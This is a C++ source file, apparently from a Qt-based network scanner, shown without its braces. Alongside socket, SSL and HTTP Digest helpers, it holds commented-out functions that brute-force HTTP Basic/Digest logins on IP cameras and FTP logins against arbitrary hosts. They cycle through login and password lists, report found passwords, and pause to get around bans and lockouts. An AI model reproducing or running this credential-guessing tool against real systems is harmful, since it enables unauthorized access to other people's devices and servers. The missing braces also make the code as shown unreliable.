2015-03-16 17:29:34 +03:00

1745 lines
55 KiB

#include "STh.h"
#include <libssh/libssh.h>
#include <sstream>
#include <openssl/md5.h>
#include "mainResources.h"
#include "externFunctions.h"
#include "externData.h"
#include <openssl/err.h>
#include <Utils.h>
#include <BruteUtils.h>
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
#include <iphlpapi.h>
#include <icmpapi.h>
#pragma comment(lib, "iphlpapi.lib")
int gMaxBrutingThreads = 200;
fd_set write_fs;
int _countFTPDirectories(char *recvBuff){
if(strcmp(recvBuff, "dummy\r\n") == 0) return 0;
int dirCounter = 0;
if(recvBuff[strlen(recvBuff) - 1] != '\n') strcat(recvBuff, "\n");
char *dirPtr = strstr(recvBuff, "\n");
while(dirPtr != NULL){
dirPtr = strstr(dirPtr + 1, "\n");
return dirCounter;
bool debugWriteWait = false;
void _DebugWriteHTMLToFile(char *request, char *buff)
while(debugWriteWait) Sleep(50);
debugWriteWait = true;
FILE *df = fopen("./debugData.txt", "a");
if(df != NULL)
fputs(request, df);
fputs("==========================\n", df);
fputs(buff, df);
fputs("\n==========================\n==========================\n\n", df);
stt->doEmitionRedFoundData("[DEBUG] Cannot open debugData.txt");
debugWriteWait = false;
unsigned char tl(unsigned char d)
if(d >= 192 && d <= 223)
return (unsigned char)(d + 32);
return tolower(d);
int recvWT(
int Socket,
char *Buffer,
int Len,
long Timeout,
int *bTimedOut
fd_set ReadSet;
int n;
struct timeval Time;
Time.tv_sec = Timeout;
Time.tv_usec = 0;
*bTimedOut = false;
n = select(Socket+1,&ReadSet,NULL,NULL,&Time);
if (n > 0) { /* got some data */
return recv(Socket,Buffer,Len,0);
if (n == 0) { /* timeout */
*bTimedOut = true;
return(n) ; /* trouble */
std::string toLowerStr(const char *str)
if(str != NULL) {
int tsz = strlen(str);
char *strr = new char[tsz+1];
ZeroMemory(strr, tsz);
for (int i = 0; i < tsz; i++)
strr[i] = tl(str[i]);
memset(strr + tsz, '\0', 1);
std::string tstr = std::string(strr);
delete []strr;
return tstr;
} else return "";
// if(tsz == 1)
// {
// if(str[0] == 10) return "[No data!]";
// else return str;
// }
// else if(tsz > 1)
// {
// char * strr = new char[tsz+1];
// ZeroMemory(strr, tsz);
// for (int i = 0; i < tsz; i++)
// {
// strr[i] = tl(str[i]);
// };
// memset(strr + tsz, '\0', 1);
// std::string tstr = strr;
// delete []strr;
// return tstr;
// };
// return "";
int OpenConnection(SOCKET *sock, const char *hostname, int port)
struct hostent *host;
struct sockaddr_in addr;
if(strlen(hostname) == 0)
return -1;
if(port < 0 || port > 65535)
return -1;
if ( (host = gethostbyname(hostname)) == NULL )
if(gNegDebugMode) stt->doEmitionDebugFoundData("[<a href=\"http://" + QString(hostname) + ":" + QString::number(port) + "/\"><font color=\"#0084ff\">" + QString(hostname) + ":" + QString::number(port) + "</font></a>" + "] Rejecting in _connection: Bad IP.");
return -1;
*sock = socket(PF_INET, SOCK_STREAM, 0);
ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = *(long*)(host->h_addr);
if ( connect(*sock, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR )
return -1;
return 0;
void _baSSLWorker(char *ip, char *request, char *rvBuff)
const SSL_METHOD *method = SSLv3_client_method(); /* Create new client-method instance */
SSL_CTX *ctx = SSL_CTX_new(method); /* Create new context */
if(ctx != NULL)
SOCKET sock;
SSL_CTX_set_timeout(ctx, gTimeOut);
int result = OpenConnection(&sock, ip, 443);
if(result >= 0)
SSL *ssl = NULL;
ssl = SSL_new(ctx); /* create new SSL connection state */
if(ssl != NULL)
SSL_set_fd(ssl, sock); /* attach the socket descriptor */
SSL_write(ssl, request, strlen(request));
if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
char tempBuff[128] = {0};
int x = 1;
int xx = 0;
ZeroMemory(rvBuff, sizeof(*rvBuff));
while(xx < 512)
x = SSL_read(ssl, tempBuff, sizeof(tempBuff));
if(x <= 0) break;
Activity += x;
xx += x;
strncat(rvBuff, tempBuff, x);
ZeroMemory(tempBuff, sizeof(tempBuff));
if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(rvBuff));
if(HTMLDebugMode) _DebugWriteHTMLToFile(request, rvBuff);
SSL_CTX_free(ctx); /* release context */
SSL_CTX_free(ctx); /* release context */
char buff1[512] = {0};
char buff2[512] = {0};
ERR_error_string(ERR_peek_error(), buff1);
ERR_error_string(ERR_peek_last_error(), buff2);
stt->doEmitionRedFoundData(QString(ip) + " SSL(InitCTX) 1:" + QString(buff1) + " 2:" + QString(buff2));
char *_getAttributeValue(char *str, char *val, char *ip, int port)
char res[1024] = {0};
char *ptrStart = NULL;
char *ptrS1End = NULL;
char *ptrS2End = NULL;
ptrStart = strstri(str, val);
if(ptrStart != NULL)
if(strstri(ptrStart, "qop=auth") != NULL) return "auth";
ptrS1End = _findFirst(ptrStart, "\"");
if(ptrS1End != NULL)
ptrS2End = _findFirst(ptrS1End + 1, "\"");
if(ptrS2End != NULL)
int sz = ptrS2End - ptrS1End - 1;
if(sz != 0 && sz < 1024) strncpy(res, ptrS1End + 1, sz);
else return "";
return res;
stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:<a style=\"color:#819121;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" + QString(ip) + ":" + QString::number(port) + "</a>");
return "";
stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:<a style=\"color:#919121;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" + QString(ip) + ":" + QString::number(port) + "</a>");
return "";
stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:<a style=\"color:#819121;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" + QString(ip) + ":" + QString::number(port) + "</a>");
return "";
#define HASHLEN 16
typedef char HASH[HASHLEN];
#define HASHHEXLEN 32
typedef char HASHHEX[HASHHEXLEN+1];
#define IN
#define OUT
void CvtHex(
unsigned short i;
unsigned char j;
for (i = 0; i < HASHLEN; i++) {
j = (Bin[i] >> 4) & 0xf;
if (j <= 9)
Hex[i*2] = (j + '0');
Hex[i*2] = (j + 'a' - 10);
j = Bin[i] & 0xf;
if (j <= 9)
Hex[i*2+1] = (j + '0');
Hex[i*2+1] = (j + 'a' - 10);
Hex[HASHHEXLEN] = '\0';
char *_makeDigestResponse(
char *login,
char *realm,
char *pass,
char *path,
char *nonce,
char *pszNonceCount,
char *pszCNonce,
char *pszQop
char HA1Data[512] = {0};
char HA2Data[512] = {0};
strcpy(HA1Data, login);
strcat(HA1Data, ":");
strcat(HA1Data, realm);
strcat(HA1Data, ":");
strcat(HA1Data, pass);
strcpy(HA2Data, "GET:");
strcat(HA2Data, path);
MD5((unsigned char*) HA1Data, strlen(HA1Data), (unsigned char*)HA1);
MD5((unsigned char*) HA2Data, strlen(HA2Data), (unsigned char*)HA2);
char responseData[512] = {0};
char *HA1MD5 = new char[64];
char *HA2MD5 = new char[64];
ZeroMemory(HA1MD5, 64);
ZeroMemory(HA2MD5, 64);
CvtHex(HA1, HA1MD5);
strcpy(responseData, HA1MD5);
strcat(responseData, ":");
strcat(responseData, nonce);
strcat(responseData, ":");
if (*pszQop != NULL) {
strcat(responseData, pszNonceCount);
strcat(responseData, ":");
strcat(responseData, pszCNonce);
strcat(responseData, ":");
strcat(responseData, pszQop);
strcat(responseData, ":");
CvtHex(HA2, HA2MD5);
strcat(responseData, HA2MD5);
delete []HA1MD5;
delete []HA2MD5;
char response[MD5_DIGEST_LENGTH];
MD5((unsigned char*) responseData, strlen(responseData), (unsigned char*)response);
char responseMD5[64] = {0};
CvtHex(response, responseMD5);
return (char*)responseMD5;
//lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
// if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: <a style=\"color: #efe100;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "\">" + QString(ip) + ":" + QString::number(port) + + "</a>");
// lopaStr lps;
// ZeroMemory(lps.login, sizeof(lps.login));
// ZeroMemory(lps.pass, sizeof(lps.pass));
// ZeroMemory(lps.other, sizeof(lps.other));
// int cookieLen = strlen(cookie);
// char path[512] = {0};
// strncpy(path, pathT, 512);
// int bTO;
// bool goon = false;
// char hRqst[REQUEST_MAX_SIZE] = {0};
// char headerMsg[REQUEST_MAX_SIZE] = { 0 };
// char hMsgR[512] = {0};
// strcpy(hRqst, "GET ");
// strcat(hRqst, path);
// strcat(hRqst, " HTTP/1.1\r\nHost: ");
// strcat(hRqst, ip);
// if(port != 80){
// strcat(hRqst, ":");
// char tbuff[16] = {0};
// sprintf(tbuff, "%d", port);
// strcat(hRqst, tbuff);
// };
// if(cookieLen != 0)
// {
// strcat(hRqst, "\r\nCookie: ");
// strcat(hRqst, cookie);
// };
// strcat(hRqst, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic bG9sa2E6bG9sa2F=\r\n\r\n");
// sockaddr_in sockAddr;
// if(port == 443)
// {
// ZeroMemory(headerMsg, REQUEST_MAX_SIZE);
// _baSSLWorker(ip, hRqst, headerMsg);
// }
// else
// {
// SOCKET sock;
// sockAddr.sin_family = AF_INET;
// sockAddr.sin_port = htons(port);
// HOSTENT *host;
//#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
// else
// {
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
// else
// {
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
// if(sock != INVALID_SOCKET) {
// if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) != SOCKET_ERROR) {
// if(send(sock, hRqst, strlen(hRqst), 0) != SOCKET_ERROR) {
// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(hRqst));
// ZeroMemory(headerMsg, REQUEST_MAX_SIZE);
// int x = 1;
// int xx = 0;
// while (xx < REQUEST_MAX_SIZE)
// {
// x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO);
// if(x <= 0) break;
// strncat(headerMsg, hMsgR, x);
// xx += x;
// ZeroMemory(hMsgR, sizeof(hMsgR));
// };
// if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg));
// } else {
// if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Send]: " + QString::number(WSAGetLastError()));
// };
// } else {
// if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Connect]: " + QString::number(WSAGetLastError()));
// };
// } else {
// if(gDebugMode) stt->doEmitionDebugFoundData("[BA: Invalid socket]: " + QString::number(WSAGetLastError()));
// };
// CSSOCKET(sock);
// };
// if(strlen(headerMsg) == 0)
// {
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// if(strstr(headerMsg, "401 ") == NULL
// && strstr(headerMsg, ".1 401") == NULL
// && strstr(headerMsg, ".0 401") == NULL
// && strstr(headerMsg, "<statusValue>401</statusValue>") == NULL
// && strstr(headerMsg, "<statusString>Unauthorized</statusString>") == NULL
// && strstr(headerMsg, "неправильны") == NULL && strstr(headerMsg, "Неправильны") == NULL
// && strstr(headerMsg, "Неправильны") == NULL
// )
// {
// if(strstri(headerMsg, "400 Bad") != NULL)
// {
// strcpy(lps.other, "[400 Bad Request]");
// isActive = 0;
// return lps;
// }
// else if(strstri(headerMsg, "404 Not") != NULL
// || strstr(headerMsg, "404 ") != NULL
// || strstr(headerMsg, ".1 404") != NULL
// || strstr(headerMsg, ".0 404") != NULL
// )
// {
// if(strstr(path, "/axis-cgi/com/ptz.cgi?") != NULL)
// {
// int sz = strlen("/view/viewer_index.shtml");
// strncpy(path, "/view/viewer_index.shtml", sz);
// memset(path + sz, 0, 1);
// goon = true;
// }
// else
// {
// strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data());
// isActive = 0;
// return lps;
// };
// }
// else if( //
// (strstr(headerMsg, ".1 403") != NULL //
// || strstr(headerMsg, ".0 403") != NULL //Hikkvision2
// ) //
// && strstr(headerMsg, "badAuthorization") != NULL //
// )
// {
// goon = true;
// }
// else if(strlen(headerMsg) < 16)
// {
// goon = true;
// stt->doEmitionRedFoundData("Corrupted reply: (" + QString(headerMsg) + ") " + QString(ip) + ":"+ QString::number(port));
// };
// if(goon == false)
// {
// strcpy(lps.login, "NULL");
// strcpy(lps.pass, "NULL");
// isActive = 0;
// return lps;
// };
// };
// isActive = 1;
// char tPass[256] = {0};
// char curLogin[256] = {0};
// char curPass[256] = {0};
// int cCode;
// int dataSz = 0;
// char request[REQUEST_MAX_SIZE] = {0};
// char recvBuff[4096] = {0};
// char recvBuff2[512] = {0};
// char pass[256] = {0};
// char localBuff[4096] = {0};
// strcpy(localBuff, headerMsg);
// int passCounter = 1;
// char attribute[2048] = {0};
// char nonce[512] = {0};
// char realm[512] = {0};
// char opaque[512] = {0};
// char qop[64] = {0};
// std::string encoded = "";
// for(int i = 0; i < MaxLogin; i++)
// {
// if(globalScanFlag == false) break;
// for (int j = 0; j < MaxPass; j++)
// {
// if (globalScanFlag == false) break;
// ZeroMemory(request, REQUEST_MAX_SIZE);
// ZeroMemory(curLogin, sizeof(curLogin));
// ZeroMemory(curPass, sizeof(curPass));
// strcpy(curLogin, loginLst[i]);
// strcpy(curPass, passLst[j]);
// if (strcmp(method, "[DIGEST]") == 0 && strstr(localBuff, "nonce=") != NULL)
// {
// ZeroMemory(attribute, sizeof(attribute));
//// strcpy(attribute, _getAttribute(localBuff, "WWW-Authenticate:"));
// ZeroMemory(nonce, sizeof(nonce));
// strcpy(nonce, _getAttributeValue(attribute, "nonce=", ip, port));
// ZeroMemory(realm, sizeof(realm));
// strcpy(realm, _getAttributeValue(attribute, "realm=", ip, port));
// ZeroMemory(qop, sizeof(qop));
// if (strstri(attribute, "qop") != NULL)
// {
// strcpy(qop, _getAttributeValue(attribute, "qop=", ip, port));
// };
// strcpy(request, "GET ");
// strcat(request, path);
// strcat(request, " HTTP/1.1\r\nHost: ");
// strcat(request, ip);
// if (port != 80){
// strcat(request, ":");
// char tbuff[16] = { 0 };
// sprintf(tbuff, "%d", port);
// strcat(request, tbuff);
// };
// if (cookieLen != 0)
// {
// strcat(request, "\r\nCookie: ");
// strcat(request, cookie);
// };
// strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Digest username=\"");
// strcat(request, curLogin);
// strcat(request, "\", realm=\"");
// strcat(request, realm);
// strcat(request, "\", nonce=\"");
// strcat(request, nonce);
// strcat(request, "\", uri=\"");
// strcat(request, path);
// strcat(request, "\", qop=auth, response=\"");
// strcat(request, _makeDigestResponse(curLogin, realm, curPass, path, nonce, "10000001", "9d531d56796e0dc9", qop));
// if (strstri(attribute, "opaque") != NULL)
// {
// ZeroMemory(opaque, sizeof(opaque));
// strcpy(opaque, _getAttributeValue(attribute, "opaque=", ip, port));
// strcat(request, "\", opaque=\"");
// strcat(request, opaque);
// };
// strcat(request, "\", nc=10000001, cnonce=\"9d531d56796e0dc9\"");
// strcat(request, "\r\nConnection: close\r\n\r\n");
// }
// else
// {
// ZeroMemory(tPass, sizeof(tPass));
// strncpy(tPass, curLogin, strlen(curLogin));
// strcat(tPass, ":");
// strncat(tPass, curPass, strlen(curPass));
// encoded = base64_encode((const unsigned char *)tPass, strlen(tPass));
// strcpy(request, "GET ");
// strcat(request, path);
// strcat(request, " HTTP/1.1\r\nHost: ");
// strcat(request, ip);
// if (port != 80){
// strcat(request, ":");
// char tbuff[16] = { 0 };
// sprintf(tbuff, "%d", port);
// strcat(request, tbuff);
// };
// if (cookieLen != 0)
// {
// strcat(request, "\r\nCookie: ");
// strcat(request, cookie);
// };
// strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic ");
// strcat(request, encoded.c_str());
// strcat(request, "\r\nConnection: close\r\n\r\n");
// };
// if (port == 443)
// {
// ZeroMemory(recvBuff, sizeof(recvBuff));
// if (BALogSwitched) stt->doEmitionBAData("Probing SSL:BA " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(tPass) + ";");
// _baSSLWorker(ip, request, recvBuff);
// dataSz = strlen(recvBuff);
// }
// else
// {
// cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
// if (cCode == SOCKET_ERROR) {
// int errorCode = WSAGetLastError();
// if (errorCode == WSAENOTSOCK) {
// while (errorCode == WSAENOTSOCK)
// {
// if (gDebugMode) stt->doEmitionDebugFoundData("[BA][ENOTSOCK] - [" + QString(ip) + ":" + QString::number(port) + "]");
// CSSOCKET(sock);
// sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
// cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
// errorCode = WSAGetLastError();
// };
// }
// else {
// CSSOCKET(sock);
// if (errorCode != WSAETIMEDOUT)
// {
// stt->doEmitionRedFoundData("[BA] Cannot connect to " + QString(ip) + "[" + QString::number(errorCode) + "]");
// };
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// }
// else {
// int x = 1;
// Activity += strlen(request);
// if (send(sock, request, strlen(request), 0) != SOCKET_ERROR)
// {
// if (MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
// dataSz = 0;
// ZeroMemory(recvBuff2, sizeof(recvBuff2));
// ZeroMemory(recvBuff, sizeof(recvBuff));
// while (x > 0 && dataSz < 3384)
// {
// ZeroMemory(recvBuff2, sizeof(recvBuff2));
// x = recvWT(sock, recvBuff2, sizeof(recvBuff2), gTimeOut + 5, &bTO);
// dataSz += x;
// Activity += x;
// strncat(recvBuff, recvBuff2, x);
// };
// if (BALogSwitched) stt->doEmitionBAData("Checked BA: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(curLogin) + ":" + QString(curPass) + "; - Progress: (" + QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
// }
// else
// {
// stt->doEmitionRedFoundData("[BA] Send error! [" + QString(ip) + "]");
// CSSOCKET(sock);
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// }
// };
// CSSOCKET(sock);
// };
// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff));
// if (dataSz == 0)
// {
// stt->doEmitionBAData("[BA] No reply from: " + QString(ip) + "; Repeating...");
// --j;
// continue;
// }
// else
// {
// ++passCounter;
// };
// if (strcmp(method, "[DIGEST]") == 0)
// {
// ZeroMemory(localBuff, sizeof(localBuff));
// strcpy(localBuff, recvBuff);
// };
// if (strstri(recvBuff, "http/1.1 401") != NULL
// || strstri(recvBuff, "http/1.0 401") != NULL
// || (strstri(recvBuff, "200 ok") != NULL
// && strstri(recvBuff, "<statusValue>401</statusValue>") != NULL
// && strstri(recvBuff, "<statusString>Unauthorized</statusString>") != NULL)
// )
// {
// Sleep(200);
// } else
// //if(strstri(recvBuff, "http/1.1 401") == NULL
// // || strstri(recvBuff, "http/1.0 401") == NULL
// // )
// //{
// // if ((strstri(recvBuff, "200 ok") != NULL
// // || strstri(recvBuff, "http/1.0 200") != NULL
// // || strstri(recvBuff, "http/1.1 200") != NULL
// // )
// // && strstr(headerMsg, "неправильны") == NULL
// // && strstr(headerMsg, "Неправильны") == NULL
// // && strstr(headerMsg, "Неправильны") == NULL)
// // {
// // }
// // stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
// // Sleep(200);
// // ///dummy///
// //}
// if(strstri(recvBuff, "503 service unavailable") != NULL
// || strstri(recvBuff, "http/1.1 503") != NULL
// || strstri(recvBuff, "http/1.0 503") != NULL
// || strstr(recvBuff, "400 BAD_REQUEST") != NULL
// || strstri(recvBuff, "400 bad request") != NULL
// || strstr(recvBuff, "403 Forbidden") != NULL
// )
// {
// stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
// if(j > 0) --j;
// Sleep(30000);
// }
// else if((strstri(recvBuff, "http/1.1 404") != NULL
// || strstri(recvBuff, "http/1.0 404") != NULL
// )
// && strstri(recvBuff, "Authorization required") == NULL
// )
// {
// if(HTMLDebugMode) _DebugWriteHTMLToFile(request, recvBuff);
// if (i > 0 || j > 0) stt->doEmitionYellowFoundData("[?] Unexpected 404. Check <u>" + QString(ip) + ":" + QString::number(port) + " l/p:" + QString(tPass) + "</u> manually. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")");
// else stt->doEmitionRedFoundData("[-] 404 - Wrong path detected. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")");
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// }
// else if ((strstri(recvBuff, "200 ok") != NULL
// || strstri(recvBuff, "http/1.0 200") != NULL
// || strstri(recvBuff, "http/1.1 200") != NULL
// )
// && strstri(recvBuff, "http/1.1 401 ") == NULL
// && strstri(recvBuff, "http/1.0 401 ") == NULL
// && strstri(recvBuff, "<statusValue>401</statusValue>") == NULL
// && strstri(recvBuff, "<statusString>Unauthorized</statusString>") == NULL
// && strstri(recvBuff, "неправильны") == NULL
// && strstri(recvBuff, "Неправильны") == NULL
// && dataSz > 13
// )
// {
// if(strstri(recvBuff, "access is denied") == NULL
// && strstri(recvBuff, "iisstart") == NULL
// && strstri(recvBuff, "Location:") == NULL
// && strstri(recvBuff, "access forbidden") == NULL
// )
// {
// ZeroMemory(pass, sizeof(pass));
// strcpy(pass, ip);
// strcat(pass, " - Password found: ");
// strcat(pass, tPass);
// isActive = 0;
// stt->doEmition_BAGreenData("[+] " + QString(pass));
// strcpy(lps.login, curLogin);
// strcpy(lps.pass, curPass);
// return lps;
// };
// }
// else
// {
// if (strstri(recvBuff, "неправильны") == NULL
// && strstri(recvBuff, "Неправильны") == NULL)
// {
// ZeroMemory(pass, sizeof(pass));
// sprintf(pass, "%s - Password found: %s", ip, tPass);
// char *pt1 = strstr(recvBuff, " ");
// if(pt1 != NULL)
// {
// char *pt2 = strstr(pt1 + 1, " ");
// if(pt2 != NULL)
// {
// int sz = pt2 - pt1 - 1;
// char tempHeaderCode[16] = {0};
// strncpy(tempHeaderCode, pt1 + 1, sz);
// if(strcmp(tempHeaderCode, "302") == 0 && strcmp(tempHeaderCode, "200") == 0) stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (" + QString(tempHeaderCode) + ") IP: <a style=\"color: #efe100;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "\">" + QString(ip) + ":" + QString::number(port) + "</a>");
// strcpy(lps.login, curLogin);
// strcpy(lps.pass, curPass);
// return lps;
// };
// };
// stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (?) IP: <a style=\"color: #efe100;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "\">" + QString(ip) + ":" + QString::number(port) + "</a>");
// strcpy(lps.login, curLogin);
// strcpy(lps.pass, curPass);
// isActive = 0;
// return lps;
// }
// else Sleep(200);
// };
// if(strstr(recvBuff, "Set-Cookie:") != NULL)
// {
// ZeroMemory(cookie, COOKIE_MAX_SIZE);
//// strncpy(cookie, _getAttribute(recvBuff, "Set-Cookie:"), COOKIE_MAX_SIZE);
// cookieLen = strlen(cookie);
// };
// };
// };
// isActive = 0;
// strcpy(lps.login, "UNKNOWN");
// return lps;
//lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method)
// while(BrutingThrds >= gMaxBrutingThreads) Sleep(700);
// BruteUtils::BConInc();
// lopaStr res = _BABrute(cookie, ip, port, path, method);
// BruteUtils::BConDec();
// return res;
//lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
// lopaStr lps;
// ZeroMemory(lps.login, sizeof(lps.login));
// ZeroMemory(lps.pass, sizeof(lps.pass));
// ZeroMemory(lps.other, sizeof(lps.other));
// char recvBuff[1024] = {0}, request[64] = {0};
// sockaddr_in sockAddr;
// sockAddr.sin_family = AF_INET;
// sockAddr.sin_port = htons(port);
// HOSTENT *host;
//#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
// else
// {
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
// else
// {
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// bool breakPassLoop = 0;
// int passCounter = 1;
// int bTO;
// int x = 0;
// int connectionResult, closedSocket = 1, loginFailedFlag = 0;
// SOCKET sockFTP;
// for(int i = 0; i < MaxLogin; ++i)
// {
// if(globalScanFlag == false) break;
// if(strlen(loginLst[i]) <= 1) continue;
// for(int j = 0; j < MaxPass; ++j)
// {
// if(globalScanFlag == false) break;
// if(strlen(passLst[j]) <= 1) continue;
// if(closedSocket)
// {
// closedSocket = 0;
// connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
// while(WSAGetLastError() == WSAENOTSOCK)
// {
// if(gDebugMode) stt->doEmitionDebugFoundData("[FTP][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]");
// connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
// };
// loginFailedFlag = 0;
// };
// if(connectionResult != SOCKET_ERROR)
// {
// x = 0;
// while (true)
// {
// Sleep(100);
// ZeroMemory(recvBuff, 1024);
// x = recvWT(sockFTP, recvBuff, 1024, gTimeOut + 5, &bTO);
// if(x <= 0) break;
// if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff));
// Activity += x;
// closedSocket = 0;
// if(strstr(recvBuff, "451 The parameter is incorrect") != NULL)
// {
// stt->doEmition_BARedData("[*] Unknown protocol (451 Error) - " + QString(ip));
// strcpy(lps.other, "Unknown protocol (451 Error)");
// return lps;
// };
// if(strstri(recvBuff, "only anonymous") != NULL)
// {
// stt->doEmition_BAGreenData("[*] Anonymous access detected - " + QString(ip));
// strcpy(lps.login, "anonymous");
// strcpy(lps.pass, "1");
// return lps;
// };
// if(strstr(recvBuff, "550 no connections allowed") != NULL
// || strstr(recvBuff, "550-") != NULL
// )
// {
// stt->doEmition_BARedData("[-] 550 (No connections allowed) - Ban detected. Dropping " + QString(ip));
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// if(strstr(recvBuff, "no such command"))
// {
// stt->doEmition_BARedData("[-] 500 (Sorry, no such command) " + QString(ip));
// strcpy(lps.other, "[500 Sorry, no such command]");
// return lps;
// };
// if((strstr(recvBuff, "500 ") != NULL
// || strstr(recvBuff, "500-") != NULL
// )
// && strstri(recvBuff, "500 oops") == NULL
// )
// {
// j = 0;
// break;
// };
// if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL)
// {
// break;
// };
// if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL)
// {
// ++i;
// break;
// };
// if(globalScanFlag == false) break;
// if((strstr(recvBuff, "530 Sorry") != NULL)
// || (strstr(recvBuff, "530") != NULL && strstr(recvBuff, "maximum") != NULL)
// || strstr(recvBuff, "exceeded") != NULL
// || strstr(recvBuff, "421 Too many") != NULL
// || strstr(recvBuff, "from this IP") != NULL
// || strstr(recvBuff, "from your IP") != NULL)
// {
// stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")");
// if(j > 0) --j;
